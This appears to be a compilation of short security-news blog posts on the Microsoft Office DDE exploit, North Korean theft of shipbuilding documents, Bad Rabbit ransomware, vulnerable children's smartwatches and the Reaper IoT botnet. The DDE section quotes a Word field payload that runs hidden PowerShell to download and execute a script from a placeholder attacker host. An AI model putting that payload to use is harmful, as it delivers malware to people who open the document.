Hackers Using Unpatched Microsoft Dynamic Data Exchange Exploit

There is a vulnerability present in Microsoft Office using it’s Dynamic Data Exchange (DDE) protocol. Exploiting it requires “no macros or, memory corruption”, and doesn’t show any security warnings (if correctly implemented) or raise flags with any antivirus software. There are thousands of applications that use DDE protocol, including MS Word and Excel.

DDE allows two running applications to share data, and can be set to do so either once, or whenever new data is becomes available. For example, one could use DDE to target a cell in Excel, and receive updates whenever that cell is edited. You can sync a cell in your own Excel doc with the cell in the original document.

The blog from Sensepost focused on using Microsoft Word and DDE to gain undetected access to command execution. The exploit is performed by editing an error message produced by adding a field to a Word doc. The error is edited to contain something like the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Or, you could do something worse than open the calculator, like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta 
-NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString
('http://evilserver.ninja/pp.ps1');powershell -e $e "}

Basically, you tell Word to execute an automatically updating DDE field, and then you have the field execute command prompt, also calling your payload. In the proof of concept demonstration, they used a powershell command to launch an Empire stager as the payload.

Whenever the Word document is opened it will ask first for permission to allow the file to be updated by a linked file. If DDE is something you deal with, this would be nothing unusual. There is then a second prompt which is a security warning due to the DDE asking for access to command prompt, however, this can be hidden with “proper syntax modification” according to the blog. Then you just have to get the word file on the target system, and get the target to open the file, and click okay on the one prompt that pops up to allow the data to be shared. Boom, payload delivered.

Microsoft was sent this exploit, replicated it, and decided that it was a feature, so it will not be patched anytime soon. Microsoft has also released a Security Advisory in regards to various DDE related vulnerabilities, most involve the user changing settings to use Secure and Control Office. This requires the use of the Registry Editor, which if done incorrectly can break your computer, requiring you to reinstall your OS.

This vulnerability is now being exploited by cybercriminals and state-sponsored hackers. Notably, it has been utilized by the hacking group “Fancy Bear” which is believed to be affiliated with the Russian government. They have been using a spearphishing campaign around the New York terror attack in recent weeks to bait users into clicking on the malicious documents, infecting their system with malware. It has also been used against several organizations and companies in various forms.

Since it is a Microsoft process, nothing will stop DDE from running whatever is sent through it. One way to protect yourself is by disabling DDE entirely on your machines. You can also use Microsoft’s recommendation using the Registry Editor to secure Office, or you could go into the settings for some of the apps that use DDE and disable automatic updating or receiving updates from other DDE applications. As always, don’t click links or download files from emails unless you are certain that the source is safe.


Daniel Szafran


Article Sources:

Macro-less Code Exec in MSWord    – (contains demo and proof of concept for exploit)

Russian ‘Fancy Bear’ Hackers Using (Unpatched) Microsoft Office DDE Exploit

Microsoft Security Advisory 4053440


North Korea Hackers Accused of Stealing Secret Blueprints of South Korea’s Submarine Weapon Systems



North Korean hackers have broken into computer systems in South Korea and stolen classified documents containing blueprints for submarines and warships, it has been alleged. They illegally accessed systems of Daewoo Shipbuilding and stole around 40,000 documents, according to South Korean politician Kyeong Dae-soo. Sixty “classified documents including blueprints and technical data for submarines and vessels equipped with Aegis weapon systems” made their way into North Korean hands.

The breach was discovered by the South Korean defense ministry. According to Kyung Dae-soo of the main opposition Liberty Korea Party. “We are almost 100 percent certain that North Korean hackers were behind the hacking and stole the company’s sensitive documents,” Kyeong told Reuters. A team investigating the hack concluded that North Korea was behind the attack after they reportedly uncovered similarities with other attacks known to have been previously conducted by North Korean hackers.

The country is also in the middle of building a brand new submarine that could potentially launch nuclear missiles. As US intelligence assesses that North Korea has begun construction of a new class of 2,000-ton submarine which Kim Jong-un could use to launch country’s nuclear missiles. Its existence hasn’t been confirmed yet, but US intelligence sources are closely monitoring the country’s shipyards in order to get an idea of what is happening.






-Matthew Brown

New Ransomware Spreads across Europe

A new ransomware, dubbed “Bad Rabbit”,  has been spreading quickly throughout Europe in the past few months.  The Petya-like attack (27% of BadRabbit code has been seen in Petya samples) has struck corporate and personal networks alike utilizing “drive-by” download attacks.  An initial analysis by Kaspersky Labs states that the malware spreads by luring victims using fake Adobe Flash Player installers meaning that no exploits were used in the distribution of the malware, the victim must manually execute the malware dropper.

Once executed, BadRabbit scans the internal network for open SMB (Server Message Block) shares and tries a hardcoded list of commonly used credentials to spread the ransomware.  It also uses the post-exploitation tool “Mimikatz” to extract the credentials off of the infected systems. This is notable because it marks a new wave of ransom attack, one that doesn’t utilize the “EternalBlue” exploit, the exploit used by notable ransomware such as WannaCry and Petya to spread throughout networks.  The same report also stated that numerous compromised websites have been detected “all of which were news or media websites.”

After spreading through a network, BadRabbit utilizes an open-source full drive encryption service called DiskCryptor that encrypts files using RSA 2048 keys.  After this, a ransom note appears on the screen asking victims to log into an onion website to make an initial payment of .05 bitcoin (or ~$285) in order to get their encryption key.  A countdown timer, originally set for 40 hours, is also displayed with the threat of increasing the price of the key if no payment is sent within the time frame.


Image result for bad rabbit screenshots

Affected organizations include Russian news agencies Interfax and Fontanka as well as the payment systems used in the Kiev Metro, Odessa International Airport, and the Ukranian Ministry of Infrastructure. Interfax was hit particularly hard, 24 hours after the attack their website still displayed the message “our service is temporarily unavailable.”

The head of Russian cyber-security firm Group-IB, Illya Sachkov says, “In some of the companies, the work has been completely paralyzed – servers and workstations are encrypted.” U.S. officials have stated that they have “received numerous reports ofBadRabbit ransomware infections in many countries around the world.”  The Russian central bank released a statement that there were recorded BadRabbit attacks on several of the top 20 Russian financial institutions, but that none had been compromised.

So far, attacks have been heavily concentrated in Russia, however, attacks have also been recorded in Ukraine, Turkey, and Germany.  An analysis is still being done on BadRabbit to try and find a way to decrypt computers without having to pay, as well as how to stop it from spreading further.

The malware is still undetected by the majority of anti-virus programs according to Virus Total. For now, Kaspersky Labs suggests that you disable the WMI service on your computers to prevent the malware from spreading over your network, as well as changing default credentials within your network.






Smartwatches designed for children have become a target for hackers.

Smartwatches are becoming more and more popular to the general population. However did you know even young children are starting to wear smartwatches. In theory this sounds like not such a bad idea they give the parent a way to see where their young child is and communicate with them if need be. These watches also offer a way for the child to quickly call their parents in case of an emergency. This all sound good until you realize a hacker can get into the watch and do the same things.

The Norwegian Consumer Council tested some of these watches and found that some were transmitting the GPS data without encryption. This allows for hackers with basic tools to get into the watch and track the movements of the child wearing the watch, which is an incredibly dangerous problem. The hacker could also spoof the location and make it look like the child is in a completely different place. They also found that the hacker could communicate with the child and eavesdrop on the conversations the child is having with others on the watch. Thankfully many of the company’s who designed and produce the watches have recalled the watches and started to fix the problems and make them more secure.

-Levi Walker




Reaper Botnet Dwarfs Mirai


By this point everyone and their mother has heard of the botnet dubbed ‘Mirai’, an infamous botnet infrastructure from last year that managed to take down a good chunk of the internet by attacking Dyn, a DNS provider. Well as of this September, weak passwords might have become the least of your worries if you’re like 60% of Check Point’s ThreatCloud covered corporations, and have un-patched vulnerabilities on your network.

Dubbed Reaper, or IOTroop by some, a new IoT botnet is propagating, and shows no sign of slowing down. Today, researchers have ruled out the possibility that Mirai and Reaper are connected, at least on a technical level, due to the superiority that Reaper has displayed in its intrusion and propagation techniques. Whereas Mirai was spread through the exploitation of default passwords across IoT devices, Reaper utilizes a specialized strand of malware that exploits well known vulnerabilities (such as those present in many printers and IoT toasters) to gain entry to a device, and further uses that device to spread itself to others connected.

With near exponential growth, Qihoo 360 Netlab witnessed approximately 2 million newly infected devices waiting to be processed by a C&C server, of which there are several that have thus been identified. The best thing that any concerned corporation or user can do at this point in time, would be to ensure that every machine on their network has updated firmware, and software in an attempt to limit the spread of this variable plague infecting IoT networks worldwide.

Currently, it appears as if we all might be witnessing a ‘calm before the storm’, situation, with this botnet ramping up massively in numbers and, according to Check Point, updating its capabilities on a daily basis. What else can I say but stay safe, and brace for impact, as when this thing hits, it’ll make the Dyn attack look like a birthday party.

– Kenneth Nero

Sources: Here, and Here, also Here